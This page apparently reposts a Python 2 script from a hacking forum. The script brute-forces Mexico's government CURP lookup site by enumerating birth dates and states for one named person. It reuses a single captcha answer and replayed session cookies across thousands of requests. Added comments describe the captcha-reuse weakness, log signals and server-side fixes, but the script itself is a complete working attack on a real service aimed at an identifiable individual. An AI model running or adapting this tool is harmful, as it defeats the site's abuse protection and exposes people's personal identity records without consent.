de Commodious Pig, 1 año han pasado desde su publicación, escrito en Python.
Este código es una respuesta a curp_force.py de Foros Hackerss
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3.  
  4. import sys
  5. import urllib2
  6. from BeautifulSoup import BeautifulSoup
  7.  
  8. # Visto en http://foros.hackerss.com/web/brute-force-a-consultas-curp-gob-mx
  9. # Coded by m4s73r <ms7rbeta@gmail.com> <root404.com>
  10. # CURP FORCE - Brute force attack to http://consultas.curp.gob.mx/
  11.  
class CurpForce:
  """Enumerate birth date and state against a CURP lookup form for one name.

  The instance holds a fixed surname/name/sex and walks every combination of
  the configured state codes, years, months and days, sending one GET request
  per combination with the same session cookies and the same captcha answer.

  Defensive reading: the loop only works if the server accepts one captcha
  answer for many requests in a session (see main()). A captcha that is
  invalidated after a single use, together with a per-session and per-source
  limit on lookups, removes that precondition. In access logs the activity
  shows up as a burst of requests to one path from one session in which only
  the state/date parameters change.
  """

  def __init__(self):
    """Set the endpoint, the fixed identity fields and the search space."""
    # Plain-HTTP endpoint: the session cookies sent by start() travel
    # unencrypted.
    self.URL = "http://consultas.curp.gob.mx/CurpSP/curp11.do"
    # Session cookie values; empty until main() reads them from stdin.
    self.JSESSIONID, self.BIGipServerApp = "", ""
    # The name must not take accents (although this has them)
    # Spaces in the name must be replaced by '+'
    # (the values are concatenated into the URL without URL-encoding).
    self.fLastName, self.sLastName, self.name, self.sex = "BAEZ", "MONTEJO", "BELEN", "M"
    # Days 1..31 are tried for every month, so impossible dates (for example
    # day 31 of month 02) are requested too; that is a usable log signal.
    self.dia = range(1,32)
    # Months 1..12.
    self.mes = range(1,13)
    # Years 2000..2009 (the upper bound of range() is exclusive).
    self.anio = range(2000,2010)
    #self.anio = [2000]
    # Two-letter state codes kept for reference; the `"XX">NAME` shape
    # suggests they were copied from the form's option list (not confirmed
    # by this listing).
        #"AS">AGUASCALIENTES
        #"BC">BAJA CALIFORNIA
        #"BS">BAJA CALIFORNIA SUR
        #"CC">CAMPECHE
        #"CL">COAHUILA DE ZARAGOZA
        #"CM">COLIMA
        #"CS">CHIAPAS
        #"CH">CHIHUAHUA
        #"DF">DISTRITO FEDERAL
        #"DG">DURANGO
        #"GT">GUANAJUATO
        #"GR">GUERRERO
        #"HG">HIDALGO
        #"JC">JALISCO
        #"MC">MEXICO
        #"MN">MICHOACAN DE OCAMPO
        #"MS">MORELOS
        #"NT">NAYARIT
        #"NL">NUEVO LEON
        #"OC">OAXACA
        #"PL">PUEBLA
        #"QT">QUERETARO DE ARTEAGA
        #"QR">QUINTANA ROO
        #"SP">SAN LUIS POTOSI
        #"SL">SINALOA
        #"SR">SONORA
        #"TC">TABASCO
        #"TS">TAMAULIPAS
        #"TL">TLAXCALA
        #"VZ">VERACRUZ
        #"YN">YUCATAN
        #"ZS">ZACATECAS
        #"NE">NACIDO EN EL EXTRANJERO
    #self.city = ["AS","BC","BS","CC","CL","CM","CS","CH","DF","DG","GT","GR","HG","JC","MC","MN","MS","NT","NL","OC","PL","QT","QR","SP","SL","SR","TC","TS","TL","VZ","YN","ZS","NE"]
    # Active search space: two state codes only.
    self.city = ["MC","DF"]
    # _type is stored here, but start() writes the literal "strTipo=A" into
    # the URL instead of reading it. captcha is filled in by main().
    self._type, self.captcha = "A", ""


  def start(self):
    """Send one lookup per (state, year, month, day); stop at the first hit.

    Reads the identity fields, search ranges, cookies and captcha from the
    instance, prints one progress line per request and returns None. With
    the values set in __init__ this is at most 2 * 10 * 12 * 31 = 7440
    requests, issued back to back with no delay, which is the volume a
    rate limit or an alert threshold on this path would have to catch.
    """
    # Static, browser-like request headers. The Cookie header replays the
    # session values typed in main(), so every request belongs to the same
    # server-side session.
    opener = urllib2.build_opener()
    opener.addheaders.append(('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'))
    opener.addheaders.append(('Accept-Encoding', 'gzip,deflate,sdch'))
    opener.addheaders.append(('Accept-Language', 'es-419,es;q=0.8,en;q=0.6,gl;q=0.4'))
    opener.addheaders.append(('Cookie', 'JSESSIONID=' + self.JSESSIONID + '; BIGipServerApp_Consultas_CURP_en_portales_CURP_SP=' + self.BIGipServerApp))
    opener.addheaders.append(('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36'))

    # Fixed part of the query string: the three name fields.
    url = self.URL
    #url += "jsessionid=" + self.JSESSIONID
    url += "?strBAEZ=" + self.fLastName
    url += "&strMONTEJO=" + self.sLastName
    url += "&strBELEN=" + self.name

    # found is re-checked at every loop level so that all four loops unwind
    # after the first hit.
    found = False

    for e in self.city:
      if found:
        break
      eurl = url + "&sEntidadA=TC" + e
      for a in self.anio:
        if found:
          break
        aurl = eurl + "&stranio=" + str(a)
        for m in self.mes:
          if found:
            break
          # Month and day are zero-padded to two digits.
          murl = aurl + "&strmes=" + str(m).zfill(2)
          for d in self.dia:
            if found:
              break
            durl = murl + "&strdia=" + str(d).zfill(2)

            print "[SEARCH]: %s %s %s [CITY:%s,YEAR:%s,MONTH:%s,DAY:%s]" %(self.fLastName, self.sLastName, self.name, e, a, m, d)

            # The same captcha answer is appended to every request.
            # Errors raised by opener.open() are not caught here and would
            # end the run.
            final = durl + "&sSexoA=" + self.sex + "&strTipo=A&codigo=" + self.captcha
            f = opener.open(final).read()

            # A response counts as a miss when it contains any of these
            # three strings; any other response is treated as a hit.
            if "No se encuentra" in f or "no es V" in f or "Ocurrio un error" in f:
              print " [NOT-FOUND]"
            else:
              found = True
              print "\n [!!][FOUND] : URL[%s]" %(final)


  def main(self):
    """Prompt for the session cookies and captcha answer, then read commands.

    "start" runs start(), "exit" ends the process through sys.exit(); any
    other input is ignored and the prompt is shown again.
    """
    #set cookies
    # The two cookie values are copied by hand from a browser session on
    # http://consultas.curp.gob.mx/ (for example with a cookie management
    # tool).
    self.JSESSIONID = raw_input("\n [JSESSIONID] = ")
    self.BIGipServerApp = raw_input(" [BIGipServerApp] = ")
    #get captcha
    #captcha remains the same for the entire session
    # The listing's author names this as the weakness: one answer solved by
    # a person keeps being accepted for every later request in the session.
    # Server-side fix: invalidate the captcha after a single validation and
    # cap lookups per session.
    self.captcha = raw_input(" [CAPTCHA] = ")

    while 1:
      cmd = raw_input("\n [>>] ");

      if cmd == "start":
        self.start()
      elif cmd == "exit":
        sys.exit()

# Created at module level, so the instance also exists when the file is
# imported rather than executed.
CF = CurpForce()

# The interactive prompt starts only when the file is run as a script.
if __name__ == "__main__":
    CF.main()
  129.